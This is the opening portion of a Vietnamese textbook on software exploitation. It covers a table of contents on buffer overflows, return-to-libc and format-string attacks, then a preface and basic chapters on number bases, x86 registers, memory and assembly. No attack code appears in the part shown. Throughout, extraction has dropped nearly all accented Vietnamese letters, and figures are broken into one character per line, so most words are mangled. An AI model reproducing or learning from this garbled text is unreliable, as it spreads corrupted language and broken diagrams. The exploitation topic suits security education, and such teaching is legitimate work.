Nghe Thuat Tan Dung Loi Phan Mem

Ngh thut tn dng li phn mm
Nguyn Thnh Nam

Ngy 28 thng 2 nm 2009
2
Mc lc
1 Gii thiu 7
1.1 Cu trc ti liu . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.2 Lm sao s dng hiu qu ti liu ny . . . . . . . . . . . . . 8
2 My tnh v bin dch 11
2.1 H c s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
2.1.1 Chuyn i t h c s bt k sang h c s mi . . . . 12
2.1.2 Chuyn i qua li gia h nh phn v h thp lc phn 12
2.1.3 Bng m ASCII . . . . . . . . . . . . . . . . . . . . . . . 13
2.2 Kin trc my tnh . . . . . . . . . . . . . . . . . . . . . . . . . . 13
2.2.1 B vi x l (Central Processing Unit, CPU) . . . . . . . . 13
2.2.2 Thanh ghi . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
2.2.3 B nh v a ch tuyn tnh . . . . . . . . . . . . . . . . 17
2.2.3.1 nh a ch nh . . . . . . . . . . . . . . . . . 17
2.2.3.2 Truy xut b nh v tnh kt thc nh . . . . . 17
2.2.4 Tp lnh, m my, v hp ng . . . . . . . . . . . . . . . 18
2.2.4.1 Cc nhm lnh . . . . . . . . . . . . . . . . . . . 20
2.2.4.2 C php . . . . . . . . . . . . . . . . . . . . . . 20
2.2.4.3 Ngn xp . . . . . . . . . . . . . . . . . . . . . . 21
2.2.4.4 Cc lnh gi hm . . . . . . . . . . . . . . . . . 22
2.3 Trnh bin dch v cu trc mt hm . . . . . . . . . . . . . . . . 27
2.3.1 Dn nhp . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
2.3.2 Thn . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
2.3.3 Kt thc . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
2.3.4 Gi hm . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
2.3.5 Con tr vng nh . . . . . . . . . . . . . . . . . . . . . . 30
2.4 Tm tt v ghi nh . . . . . . . . . . . . . . . . . . . . . . . . . . 33
3 Trn b m 35
3.1 Gii thiu . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
3.2 Thay i gi tr bin ni b . . . . . . . . . . . . . . . . . . . . . 37
3.3 Truyn d liu vo chng trnh . . . . . . . . . . . . . . . . . . 40
3.4 Thay i lung thc thi . . . . . . . . . . . . . . . . . . . . . . . 43
3.4.1 K thut c . . . . . . . . . . . . . . . . . . . . . . . . . . 43
3.4.2 Lung thc thi (control flow) . . . . . . . . . . . . . . . . 45
3.4.3 Tm a ch nhnh bng . . . . . . . . . . . . . . . . . . 47
3.4.3.1 Vi GDB . . . . . . . . . . . . . . . . . . . . . . 48
3.4.3.2 Vi objdump . . . . . . . . . . . . . . . . . . . . 49
3
4 MC LC
3.4.4 Quay v chnh thn hm . . . . . . . . . . . . . . . . . . . 50
3.5 Quay v th vin chun . . . . . . . . . . . . . . . . . . . . . . . 52
3.5.1 Chn d liu vo vng nh ca chng trnh . . . . . . . 52
3.5.1.1 Bin mi trng . . . . . . . . . . . . . . . . . . 53
3.5.1.2 Tn tp tin thc thi . . . . . . . . . . . . . . . . 55
3.5.1.3 Tham s dng lnh . . . . . . . . . . . . . . . . 55
3.5.1.4 Chnh bin buf . . . . . . . . . . . . . . . . . . . 55
3.5.2 Quay v lnh gi hm printf . . . . . . . . . . . . . . . . 55
3.5.3 i tm chui b nh cp . . . . . . . . . . . . . . . . . . 57
3.5.4 Quay tr li v d . . . . . . . . . . . . . . . . . . . . . . 60
3.5.5 Gi chng trnh ngoi . . . . . . . . . . . . . . . . . . . 61
3.5.5.1 Vi trng hp tn chng trnh l a . . . . . . 61
3.5.5.2 Vi trng hp tn chng trnh l abc . . . . . 65
3.6 Quay v th vin chun nhiu ln . . . . . . . . . . . . . . . . . . 68
3.7 Tm tt v ghi nh . . . . . . . . . . . . . . . . . . . . . . . . . . 70
4 Chui nh dng 73
4.1 Khi nim . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
4.2 Qut ngn xp . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
4.3 Gp li d liu nhp . . . . . . . . . . . . . . . . . . . . . . . . . 76
4.4 Thay i bin cookie . . . . . . . . . . . . . . . . . . . . . . . . . 77
4.4.1 Mang gi tr 0x64 . . . . . . . . . . . . . . . . . . . . . . 78
4.4.2 Mang gi tr 0x100 . . . . . . . . . . . . . . . . . . . . . . 79
4.4.3 Mang gi tr 0x300 . . . . . . . . . . . . . . . . . . . . . . 79
4.4.4 Mang gi tr 0x300, ch s dng mt %x v mt %n . . . . 81
4.4.5 Mang gi tr 0x87654321 . . . . . . . . . . . . . . . . . . . 81
4.4.6 Mang gi tr 0x12345678 . . . . . . . . . . . . . . . . . . . 83
4.4.7 Mang gi tr 0x04030201 . . . . . . . . . . . . . . . . . . . 84
4.4.8 Lp li vi chui nhp bt u bng BLUE MOON . . . 87
4.4.9 Mang gi tr 0x69696969 . . . . . . . . . . . . . . . . . . . 88
4.5 Phn on .dtors . . . . . . . . . . . . . . . . . . . . . . . . . . 88
4.6 Bng GOT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
4.7 Tm tt v ghi nh . . . . . . . . . . . . . . . . . . . . . . . . . . 93
5 Mt s loi li khc 95
5.1 Trng hp ua (race condition) . . . . . . . . . . . . . . . . . . 95
5.2 D mt (off by one) . . . . . . . . . . . . . . . . . . . . . . . . . 99
5.3 Trn s nguyn (integer overflow) . . . . . . . . . . . . . . . . . . 101
5.4 Tm tt v ghi nh . . . . . . . . . . . . . . . . . . . . . . . . . . 102
6 Tm tt 105
Li ni u
Mc tiu ca quyn sch ny l chia s k nng tn dng li phn mm ti
bn c am m cng ngh. Thng qua nhng iu c trnh by trong Ngh
Thut Tn Dng Li Phn Mm, tc gi hy vng s chuyn nhng kin thc t
lu c xem l ma thut thnh khoa hc, vi cc con s, cc cch thc tnh
r rng, d hiu, v hp l. Cng vi da DVD i km, bn c s c iu kin
thc hnh ngay nhng k thut trong sch trn mi trng my o VMware,
vi h iu hnh Debian phin bn mi nht, v nhn Linux 2.6.
5
6 MC LC
Chng 1
Gii thiu
T khi ra i v tr nn ph bin vo nhng nm u thp k 80, my vi tnh
(ti liu ny cn gi ngn gn l my tnh) ng gp tch cc trong mi mt
ca i sng nh sn xut, kinh doanh, gio dc, quc phng, y t. Tc tnh
ton nhanh, chnh xc, tnh kh chuyn, a dng l nhng l do gp phn lm
cho my vi tnh c a vo s dng ngy cng nhiu. Nu cch nay 20 nm
cch nhanh nht gi mt l th di vi trang n mt ngi bn xa l qua
dch v pht chuyn nhanh ca bu in th ngy nay iu ny xy ra trong
vng cha y 20 giy qua th in t. Nu ngy trc k ton vin phi lm
vic vi c ngn trang giy v ch s th by gi h ch cn nhn nt v nhp
lnh vo cc chng trnh bng tnh thng dng t c cng kt qu.
My vi tnh c th thay i b mt v cch lm vic ca x hi l hon ton
nh vo s ph hp, v a dng ca cc ng dng chy trn n. Chng trnh
phc v tc nghip nhn s, h thng qun l qu ngn hng, b phn iu
khin qu o tn la l nhng v d ca cc ng dng my tnh. Chng cng
ni ln tm quan trng ca my vi tnh v d liu s trong cuc sng chng ta.
Tht nghip, hoc c cng n vic lm c th ch l s i thay ca mt bit t 0
thnh 1; s d trong ti khon ngn hng tr nn ph thuc vo chun xc
ca chng trnh qun l qu; v chin tranh gia hai nc gi y tr thnh
cuc chin trong khng gian o.
Trong thi i thng tin ngy nay, vic m bo an ton thng tin cng
tr nn bc xc hn bao gi ht. Nhng phng chng c tin tc th trc
ht ta cn hiu c cch thc m nhng l hng phn mm b tn dng. Cc
phng tin truyn thng thng xuyn vit v nhng l hng, v thit hi m
chng dn ti nhng v thng tin cung cp cn hn ch nn v tnh thn
k ha nhng k thut khoa hc n thun. V vic gii thch cn k, c bn
nhng k thut ny l mc tiu ca quyn sch bn ang cm trn tay.
1.1 Cu trc ti liu
Ti liu ny c chia ra lm bn phn chnh. Chng 2, nguyn l hot
ng c bn ca my vi tnh s c trnh by vi cc phn nh v thanh ghi,
b nh, cc lnh c bn. Mt phn quan trng trong chng ny l s gii thiu
v hp ng v cch trnh bin dch (compiler) chuyn t ngn ng cp cao nh
C sang ngn ng cp thp hn nh hp ng. Nhng quy nh v cch s dng
7
8 CHNG 1. GII THIU
k hiu, minh ha b nh trong ti liu cng c xc nh trong chng ny.
Chng 2 rt quan trng trong vic to nn mt nn tng kin thc cho cc
trao i trong nhng chng sau.
Cc chng khc trong ti liu c trnh by mt cch ring l nn bn
c c th b qua nhng chng khng lin quan ti vn mnh quan tm v
c trc tip chng hoc mc tng ng.
Trong Chng 3, chng ta s bn n mt dng li c bit ph bin l li
trn b m. Sau khi gii thch th no l trn b m, cc v d nu ra
trong sch s ni v mt vi nguyn tc c bn tn dng loi li ny, cng
nh cc k thut hay gp bao gm iu khin gi tr bin ni b, iu khin
con tr lnh, quay v th vin chun, kt ni nhiu ln quay v th vin chun.
Dng li ph thng th hai c bn n k tip trong Chng 4 l li chui
nh dng. Tuy khng ph bin nh li trn b m nhng mc nguy hi
ca loi li ny cng rt cao do kh nng ghi mt gi tr bt k vo mt vng
nh bt k, cng thm s d dng trong vic tn dng li. Do , phn ny,
chng ta s xem xt bn cht ca loi li chui nh dng, ba n s quan trng
tn dng li, cc bi tp ghi mt gi tr vo vng nh nh, v cc hng
tn dng ph bin nh ghi phn vng .dtors, ghi tiu mc trong GOT.
Phn chnh cui cng ni v mt s cc loi li tng i t gp v c bit
nhng tc hi cng khng nh. Chng 5 bn v li trng hp ua, d mt,
v trn s nguyn.
Mi chng u kt thc vi mt mc tm tt v ghi nh. Nhng kin thc
ch o c trnh by trong chng tng ng s c c kt thnh cc chm
im trong mc ny.
1.2 Lm sao s dng hiu qu ti liu ny
Cc chng trong ti liu bn v cc vn ring l khng ph thuc ln nhau.
Tuy nhin c gi c khuyn khch c qua Chng 2 trc c nn tng
cho nhng chng sau, hoc t nht l lm quen vi cc k hiu, quy c c
s dng trong ti liu. Sau , ty vo mc ch ca mnh, c gi c th c
tip cc chng bn v nhng vn c lin quan.
Ti liu ny mc d c th c c nh nhng ti liu khc nhng hiu
qu s tng ln nhiu ln nu bn c cng ng thi thc tp trn mi trng
my o i km. Mi trng ny c thit k c bit gip bn c thun
tin nht trong vic kho st v nm bt cc kin thc c bn c trnh by
trong ti liu. ng thi, nhng hnh chp dng lnh trong ti liu u c
chp t chnh mi trng my o ny nn bn s khng ng ngng vi cc s
liu, a ch, cch hot ng ca chng trnh trong .
Trong mi chng, bn c s gp nhng Dng c v suy ngh. y
l nhng cu hi cng c kin thc v nng cao hiu bit nn bn c c
khuyn khch dng c v suy ngh v vn trong khong 30 pht trc khi
tip tc.
1.2. LM SAO S DNG HIU QU TI LIU NY 9
'
&
$
%
Dng c v suy ngh
Khi gp cc nh th ny, bn nn b cht thi gian suy ngh v vn
t ra. Ring y, bn khng cn lm vy.
Cui mi chng c phn tm tt v ghi nh. Nu bn c t thi gian c
ht c chng th mc ny s gip bn nm bt i ca chng mt cch
h thng v xc tch nht.
Vi nhng im lu trn, chng ta sn sng tip tc vi nhng kin
thc v cu trc my vi tnh.
10 CHNG 1. GII THIU
Chng 2
My tnh v bin dch
Mc ch cui cng ca vic tn dng li phn mm l thc thi cc tc v mong
mun. lm c iu , trc ht chng ta phi bit r cu trc ca my
tnh, cch thc hot ng ca b vi x l, nhng lnh m b vi x l c th
thc hin, lm sao truyn lnh ti b vi x l. Vic ny cng tng t nh hc
chy xe my vy. Chng ta phi bit nhn vo nt no khi ng my, nt
no bt n xin ng, lm sao r tri, lm sao dng xe.
Trong chng ny, chng ta s xem xt cu trc my tnh m c bit l b
vi x l (Central Processing Unit, CPU), cc thanh ghi (register), v b lnh
(instruction) ca n, cch nh a ch b nh tuyn tnh (linear addressing).
K tip chng ta s bn ti m my (machine code), ri hp ng (assembly lan-
guage) c th chuyn qua trao i v cch chng trnh bin dch (compiler)
chuyn mt hm t ngn ng C sang hp ng. Kt thc chng chng ta s
a ra mt m hnh v tr ngn xp (stack layout, stack diagram) ca mt hm
mu vi cc i s v bin ni b.
Trong sut ti liu ny, chng ta s ch ni n cu trc ca b vi x l Intel
32 bit.
2.1 H c s
Trc khi i vo cu trc my tnh, chng ta cn nm r mt kin thc nn
tng l h c s. C ba h c s thng dng m chng ta s s dng trong ti
liu ny:
H nh phn (binary) l h c s hai, c my tnh s dng. Mi mt ch
s c th c gi tr l 0, hoc 1. Mi ch s ny c gi l mt bit. Tm
(8) bit lp thnh mt byte (c k hiu l B). Mt kilobyte (KB) l 1024
(2
10
) byte. Mt megabyte (MB) l 1024 KB.
H thp phn (decimal) l h c s mi m chng ta, con ngi, s dng
hng ngy. Mi mt ch s c th c gi tr l 0, 1, 2, 3, 4, 5, 6, 7, 8, hoc
9.
H thp lc phn (hexadecimal) l h c s mi su, c s dng tnh
ton thay cho h nh phn v n ngn gn v d chuyn i hn. Mi mt
ch s c th c gi tr 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, v F trong
11
12 CHNG 2. MY TNH V BIN DCH
Thp phn Thp lc phn Nh phn
0 0 0000
1 1 0001
2 2 0010
3 3 0011
4 4 0100
5 5 0101
6 6 0110
7 7 0111
8 8 1000
9 9 1001
10 A 1010
11 B 1011
12 C 1100
13 D 1101
14 E 1110
15 F 1111
Bng 2.1: Chuyn i gia h thp lc phn v nh phn
A c gi tr l 10 (thp phn), B c gi tr l 11 v tng t vi C, D,
E, F.
2.1.1 Chuyn i t h c s bt k sang h c s mi
Gi c s l R, s ch s l n, ch s v tr mang t ngha nht (least
significant digit) l x
0
(thng l s tn cng bn phi), ch s ti v tr mang
nhiu ngha nht (most significant digit) l x
n1
(thng l s tn cng bn
tri), v cc ch s cn li t x
1
cho ti x
n2
. Gi tr thp phn ca con s ny
s c tnh theo cng thc sau:
Gi a tr
.
i thp ph an = x
0
R
0
+ x
1
R
1
+ ... + x
n2
R
n2
+ x
n1
R
n1
V d gi tr thp phn ca s nh phn 00111001 (R = 2, n = 8) l
1 2
0
+0 2
1
+0 2
2
+1 2
3
+1 2
4
+1 2
5
+0 2
6
+0 2
7
= 57, gi tr
thp phn ca s thp lc phn 7F (R = 16, n = 2) l 1516
0
+716
1
= 127.
2.1.2 Chuyn i qua li gia h nh phn v h thp lc
phn
Mi mt ch s trong h thp lc phn tng ng vi bn ch s h nh phn
v 16 = 2
4
. Do , chuyn i qua li gia hai h ny, chng ta ch cn chuyn
i tng bn bit theo Bng 2.1.
V d gi tr nh phn ca s thp lc phn AF l 10101111 v A tng
ng vi 1010 v F tng ng vi 1111, gi tr thp lc phn ca s nh phn
01010000 l 50.
2.2. KIN TRC MY TNH 13
0 1 2 3 4 5 6 7 8 9 A B C D E F
0
1
2
3 0 1 2 3 4 5 6 7 8 9
4 A B C D E F G H I J K L M N O
5 P Q R S T U V W X Y Z
6 a b c d e f g h i j k l m n o
7 p q r s t u v w x y z
Bng 2.2: Mt vi gi tr ph thng trong bng m ASCII
2.1.3 Bng m ASCII
V my tnh ch hiu cc bit 0 v 1 nn chng ta cn c mt quy nh chung v
cch biu din nhng k t ch nh A, B, C, X, Y, Z. Bng m ASCII l mt
trong nhng quy nh . Bng m ny nh x cc gi tr thp phn nh hn
128 (t 00 ti 7F trong h thp lc phn) thnh nhng k t ch thng thng.
Bng m ny c s dng ph bin nn cc h iu hnh hin i u tun
theo chun ASCII.
Ngy nay chng ta thng nghe ni v bng m Unicode v n th hin c
hu ht cc ngn ng trn th gii v c bit l ting Vit c ginh ring
mt vng trong bng m. Bn thn Unicode cng s dng cch nh x ASCII
cho cc k t nh hn 128.
Bng 2.2 lit k mt s gi tr ph thng trong bng m ASCII. Theo ,
k t ch A hoa c m 41 h thp lc phn, v m thp lc 61 tng ng vi
k t ch a thng, m thp lc 35 tng ng vi ch s 5.
Ngoi ra, mt vi k t c bit nh k t kt thc chui NUL c m thp
lc 00, k t xung dng, to dng mi (line feed, new line) c m thp lc
0A, k t di con tr v u dng (carriage return) c m thp lc 0D, k t
khong trng c m thp lc 20.
Chng ta xem xt qua kin thc cn bn v cc h c s v bng m
ASCII. phn k tip chng ta s bn v b vi x l ca my tnh.
2.2 Kin trc my tnh
My tnh gm ba b phn chnh l b x l (CPU), b nhp chun (bn phm)
v b xut chun (mn hnh). Chng ta s ch quan tm n b x l v y
chnh l trung tm iu khin mi hot ng ca my tnh.
2.2.1 B vi x l (Central Processing Unit, CPU)
B vi x l c lnh t b nh v thc hin cc lnh ny mt cch lin tc,
khng ngh. Lnh sp c thc thi c quyt nh bi con tr lnh (instruction
pointer). Con tr lnh l mt thanh ghi ca CPU, c nhim v lu tr a ch
ca lnh k tip trn b nh. Sau khi CPU thc hin xong lnh hin ti, CPU
s thc hin tip lnh ti v tr do con tr lnh ch ti.
... 31 C0 90 90 ...
12345678
con tr! l"nh=12345678
(a) ang ch n lnh th nht
... 31 C0 90 90 ...
12345678
con tr! l"nh=1234567A
(b) ang ch n lnh th hai
... 31 C0 90 90 ...
12345678
con tr! l"nh=1234567B
(c) Sau khi thc hin lnh nop
Hnh 2.1: Con tr lnh
cao h!n (FFFFFFFF)
...
...
41 42 43 44
...
...
th"p h!n (00000000)
th"p
cao
Hnh 2.2: Quy c biu din
Hnh 2.1a gi s con tr lnh ang mang gi tr 12345678. iu ny c ngha
l CPU s thc hin lnh ti a ch 12345678. Ti a ch ny, chng ta c lnh
31 C0 (xor eax, eax). V lnh ny chim hai byte trn b nh nn sau khi
thc hin lnh, con tr lnh s c gi tr l 12345678 +2 = 1234567A nh trong
Hnh 2.1b.
Ti a ch 1234567A l lnh 90 (nop). Do lnh nop ch chim mt byte b
nh nn con tr lnh s tr ti nh k n ti a ch 1234567B. Hnh 2.1c minh
ha gi tr ca con tr lnh sau khi CPU thc hin lnh nop Hnh 2.1b.
bn c d nm bt, chng ta c cc quy c sau:
Nhng gi tr s cp n trong ti liu ny s c biu din dng
thp lc phn tr khi c gii thch khc.
nh s c a ch thp hn bn tay tri, a ch cao hn bn tay
phi.
nh s c a ch thp hn bn di, a ch cao hn bn trn.
i khi chng ta s biu din b nh bng mt di di t tri sang phi
nh minh ha Hnh 2.1; i khi chng ta s biu din bng mt hp
cc ngn nh, mi ngn nh di 04 byte tng ng vi 32 bit nh trong
Hnh 2.2.
T v d v con tr lnh chng ta nhn thy rng nu mun CPU thc hin
mt tc v no , chng ta cn tha mn hai iu kin:
1. Cc lnh thc thi cn c a vo b nh.
2. Con tr lnh phi c gi tr l a ch ca vng nh cha cc lnh trn.
V m lnh thc thi v d liu chng trnh u nm trn b nh nn ta c th
ti m lnh vo chng trnh thng qua vic truyn d liu thng thng. y
cng chnh l m hnh cu trc my tnh von Neumann vi b x l v b phn
cha d liu ln m lnh c tch ri.
Vic chn v x dng m lnh (shellcode) ph hp vi mc ch tn dng
li nm ngoi phm vi ca ti liu ny. Chng ta s khng bn ti cch to cc
m lnh m thay vo chng ta s gi s rng m lnh ph hp c np
vo b nh. Ni nh vy khng c ngha l vic to m lnh qu n gin nn
b b qua. Ngc li, vic to m lnh l mt vn rt phc tp, vi nhiu k
thut ring bit cho tng cu trc my, tng h iu hnh khc nhau, thm ch
cho tng trng hp tn dng ring bit. Hn na, phn ln cc m lnh ph
thng u c th c s dng li trong cc v d chng ta s bn ti nhng
phn sau nn bn c c th t p dng nh l mt bi tp thc hnh nh.
Vi gi thit iu kin th nht hon thnh, ti liu ny s tp trung vo
vic gii quyt vn th hai, tc l iu khin lung thc thi ca my tnh.
Theo kin c nhn ca tc gi, y thng l vn mu cht ca vic tn
dng li, v cng l l do chnh khin chng ta gp nhiu kh khn trong vic
c hiu cc tin tc bo ch. Tht t cho thy (v s c dn chng qua cc
v d) trong phn ln cc trng hp tn dng li chng ta ch cn iu khin
c lung thc thi ca chng trnh l thnh cng 80% ri.
Trong phn ny, chng ta cp n con tr lnh, v chp nhn rng con
tr lnh cha a ch nh ca lnh k tip m CPU s thc hin. Vy th con
tr lnh tht ra l g?
2.2.2 Thanh ghi
Con tr lnh 2.2.1 tht ra l mt trong s cc thanh ghi c sn trong CPU.
Thanh ghi l mt dng b nh tc cao, nm ngay bn trong CPU. Thng
thng, thanh ghi s c di bng vi di ca cu trc CPU.
i vi cu trc Intel 32 bit, chng ta c cc nhm thanh ghi chnh c
lit k bn di, v mi thanh ghi di 32 bit.
Thanh ghi chung l nhng thanh ghi c CPU s dng nh b nh siu tc
trong cc cng vic tnh ton, t bin tm, hay gi gi tr tham s. Cc
thanh ghi ny thng c vai tr nh nhau. Chng ta hay gp bn thanh
ghi chnh l EAX, EBX, ECX, v EDX.
Thanh ghi x l chui l cc thanh ghi chuyn dng trong vic x l chui
v d nh sao chp chui, tnh di chui. Hai thanh ghi thng gp
gm c EDI, v ESI.
Thanh ghi ngn xp l cc thanh ghi c s dng trong vic qun l cu
trc b nh ngn xp. Cu trc ny s c bn n trong Tiu mc
2.2.4.3. Hai thanh ghi chnh l EBP v ESP.
Thanh ghi c bit l nhng thanh ghi c nhim v c bit, thng khng
th c gn gi tr mt cch trc tip. Chng ta thng gp cc thanh
ghi nh EIP v EFLAGS. EIP chnh l con tr lnh chng ta bit.
EFLAGS l thanh ghi cha cc c (mi c mt bit) nh c du (sign
flag), c nh (carry flag), c khng (zero flag). Cc c ny c thay i
nh l mt hiu ng ph ca cc lnh chnh. V d nh khi thc hin lnh
ly hiu ca 0 v 1 th c nh v c du s c bt. Chng ta dng gi
tr ca cc c ny thc hin cc lnh nhy c iu kin v d nh nhy
nu c khng c bt, nhy nu c nh khng bt.
Thanh ghi phn vng l cc thanh ghi gp phn vo vic nh a ch b
nh. Chng ta hay gp nhng thanh ghi DS, ES, CS. Trong nhng th
h 16 bit, cc thanh ghi ch c th nh a ch trong phm vi t 0 n
2
16
1. vt qua gii hn ny, cc thanh ghi phn vng c s dng
h tr vic nh a ch b nh, m rng n ln 2
20
a ch nh. Cho
n th h 32 bit th h iu hnh hin i khng cn dng n cc
thanh ghi phn vng ny trong vic nh v b nh na v mt thanh ghi
thng thng c th nh v c ti 2
32
nh tc l 4 GB b nh.
2.2.3 B nh v a ch tuyn tnh
Thanh ghi l b nh siu tc nhng ng tic dung lng ca chng qu t nn
chng khng phi l b nh chnh. B nh chnh m chng ta ni n l RAM
vi dung lng thng thy n 1 hoc 2 GB.
RAM l vit tt ca Random Access Memory (b nh truy cp ngu nhin).
t tn nh vy v truy xut vo b nh th ta cn truyn a ch nh
trc khi truy cp n, v tc truy xut vo a ch no cng l nh nhau.
V th vic xc nh a ch nh l quan trng.
2.2.3.1 nh a ch nh
n th h 32 bit, cc h iu hnh chuyn sang dng a ch tuyn tnh
(linear addressing) thay cho a ch phn vng. Cch nh a ch tuyn tnh
lm n gin ha vic truy xut b nh. C th l ta ch cn x l mt gi
tr 32 bit n gin, thay v phi dng cng thc tnh ton a ch nh t hai
thanh ghi khc nhau. V d truy xut nh u tin, ta s dng a ch
00000000, truy xut nh k tip ta dng a ch 00000001 v c th. nh
sau nm a ch cao hn nh trc 1 n v.
Khi ta ni n a ch b nh, chng ta ang ni n a ch tuyn tnh ca
RAM. a ch tuyn tnh ny khng nht thit l a ch tht ca nh trong
RAM m s phi c h iu hnh nh x li. Cng vic nh x a ch b
nh c thc hin qua phn qun l b nh o (virtual memory management)
ca h iu hnh.
Kiu nh a ch tuyn tnh o nh vy cho php h iu hnh m rng
b nh tht c bng cch s dng thm phn vng trao i (swap partition).
Chng ta thng thy my tnh ch c 1 GB RAM nhng a ch b nh c th
c gi tr BFFFF6E4 tc l khong hn 3 GB.
Trong 3 GB ny, ngoi d liu cn c cc m lnh ca chng trnh. Chng
ta s bn ti cc lnh Tiu mc 2.2.4.
2.2.3.2 Truy xut b nh v tnh kt thc nh
Nh ni s qua, b vi x l cn xc nh a ch nh, v sn sng nhn d
liu t hoc truyn d liu vo b nh. Do kt ni CPU vi b nh chng
ta c hai ng truyn l ng truyn d liu (data bus) v ng truyn a
ch (address bus). Khi cn c d liu t b nh, CPU s thng bo rng a
ch nh sn sng trn ng truyn a ch, v yu cu b nh truyn d
liu qua ng truyn d liu. Khi ghi vo th CPU s yu cu b nh ly d
liu t ng truyn d liu v ghi vo cc nh.
Cc ng truyn d liu v a ch u c rng 32 bit cho nn mi ln
truy cp vo b nh th CPU s truyn hoc nhn c 32 bit ti u vic s
dng ng truyn. iu ny dn n cu hi v kch thc cc kiu d liu
nh hn 32 bit.
Cu hi u tin l lm sao CPU nhn c 1 byte thay v 4 byte (32
bit) nu mi d liu t b nh truyn v CPU u l 32 bit? Cu tr li l
CPU nhn tt c 4 byte t b nh, nhng s ch x l 1 byte theo nh yu cu
ca chng trnh. Vic ny cng ging nh ta c mt thng hng to nhng bn
trong ch mt vt nh.
Cu hi th hai lin quan ti v tr ca 8 bit d liu s c x l trong s
32 bit d liu nhn c. Lm sao CPU bit ly 8 bit no? Cc nh thit k vi
x l Intel x86 32 bit quyt nh tun theo tnh kt thc nh (little endian).
Kt thc nh l quy c v trt t v ngha cc byte trong mt kiu trnh
by d liu m byte v tr cui (v tr thp nht) c ngha nh hn byte
v tr k.
V d trong Hnh 2.3a, bn nh bt u t a ch a biu din gi tr thp
lc 42413938. Chng ta thy rng byte v tr thp nht c ngha nh nht,
v byte v tr cao nht c ngha ln nht i vi gi tr ny. Thay i 1 n
v ca byte thp ch lm gi tr thay i 256
0
= 1 n v, trong khi thay i 1
n v byte cao lm gi tr thay i 256
3
= 16777216 n v.
Cng lc , Hnh 2.3b minh ha cch biu din mt chui 89AB kt thc
bng k t NUL trong b nh. Chng ta thy tng byte ca chui (trong hnh
l gi tr ASCII ca cc k t tng ng) c a vo b nh theo ng th
t . Tnh kt thc nh khng c ngha vi mt chui v cc byte trong mt
chui c vai tr nh nhau; khng c s phn bit v mc quan trng ca tng
byte i vi d liu.
Thng qua hai hnh minh ha, bn c cng ch rng cc nh c th
cha cng mt d liu (cc byte 38, 39, 41, 42) nhng ngha ca d liu cha
trong cc nh c th c hiu theo cc cch khc nhau bi chng trnh
(l gi tr thp lc 42413938 hay l chui 89AB).
V tun theo tnh kt thc nh nn CPU s ly gi tr ti a ch thp, thay
v ti a ch cao. Xt cng v d a, nu ta ly 1 byte t 32 bit d liu bt
u t a ch a th n s c gi tr thp lc 38; 2 byte s c gi tr 3938; v 4
byte s c gi tr 42413938.
2.2.4 Tp lnh, m my, v hp ng
Tp lnh l tt c nhng lnh m CPU c th thc hin. y c th c coi
nh kho t vng ca mt my tnh. Cc chng trnh l nhng tc phm vn
hc; chng chn lc, kt ni cc t vng ring r li vi nhau thnh mt th
thng nht din t mt ngha ring.
Cng nh cc t vng trong ngn ng t nhin, cc lnh ring l c di
khc nhau (nh nu ra trong v d Hnh 2.1). Chng c th chim 1 hoc
2 byte, v i khi c th ti 9 byte. Nhng gi tr chng ta thy nh 90,
31 C0 l nhng lnh c CPU hiu v thc hin c. Cc gi tr ny c
gi l m my (machine code, opcode). M my cn c bit n nh l ngn
ng lp trnh th h th nht.
t
h
!
p.
.
.
3
8
3
9
4
1
4
2
.
.
.
c
a
o
4
2
4
1
3
9
3
8
a
a
+
1
a
+
2
a
+
3
(
a
)
i
v
i
g
i
t
r
4
2
4
1
3
9
3
8
t
h
!
p.
.
.
3
8
3
9
4
1
4
2
0
0
.
.
.
c
a
o
"
8
9
A
B
"
a
a
+
1
a
+
2
a
+
3
(
b
)
i
v
i
c
h
u
8
9
A
B
n
h
2
.
3
:
T
n
h
k
t
t
h
c
n
h

Tuy nhin, con ngi s gp nhiu kh khn nu buc phi iu khin my
tnh bng cch s dng m my trc tip. Do , chng ta sng ch ra mt
b t vng khc gn vi ngn ng t nhin hn, nhng vn gi c tnh cp
thp ca m my. Thay v chng ta s dng gi tr 90 th chng ta dng t
vng NOP, tc l No Operation. Thay cho 31 C0 s c XOR EAX, EAX, tc
l thc hin php ton lun t XOR gia hai gi tr thanh ghi EAX vi nhau
v lu kt qu vo li thanh ghi EAX, hay ni cch khc l thit lp gi tr
ca EAX bng 0. R rng b t vng ny d hiu hn cc gi tr kh nh kia.
Chng c gi l hp ng.
Hp ng c xem l ngn ng lp trnh th h th hai. Cc ngn ng khc
nh C, Pascal c xem l ngn ng lp trnh th h th ba v chng gn vi
ngn ng t nhin hn hp ng.
2.2.4.1 Cc nhm lnh
Hp ng c nhiu nhm lnh khc nhau. Chng ta s ch im qua cc nhm
v nhng lnh sau.
Nhm lnh gn l nhng lnh dng gn gi tr vo nh, hoc thanh ghi
v d nh LEA, MOV, SETZ.
Nhm lnh s hc l nhng lnh dng tnh ton biu thc s hc v d
nh INC, DEC, ADD, SUB, MUL, DIV.
Nhm lnh lun l l nhng lnh dng tnh ton biu thc lun l v d
nh AND, OR, XOR, NEG.
Nhm lnh so snh l nhng lnh dng so snh gi tr ca hai i s v
thay i thanh ghi EFLAGS v d nh TEST, CMP.
Nhm lnh nhy l nhng lnh dng thay i lung thc thi ca CPU
bao gm lnh nhy khng iu kin JMP, v cc lnh nhy c iu kin
nh JNZ, JZ, JA, JB.
Nhm lnh ngn xp l nhng lnh dng y gi tr vo ngn xp, v ly
gi tr t ngn xp ra v d nh PUSH, POP, PUSHA, POPA.
Nhm lnh hm l nhng lnh dng trong vic gi hm v tr kt qu t
mt hm v d nh CALL v RET.
2.2.4.2 C php
Mi lnh hp ng c th nhn 0, 1, 2, hoc nhiu nht l 3 i s. a s
cc trng hp chng ta s gp lnh c hai i s theo dng tng t nh
ADD dst, src. Vi dng ny, lnh s hc ADD s c thc hin vi hai i
s dst v src, ri kt qu cui cng s c li trong dst, th hin cng thc
dst = dst + src.
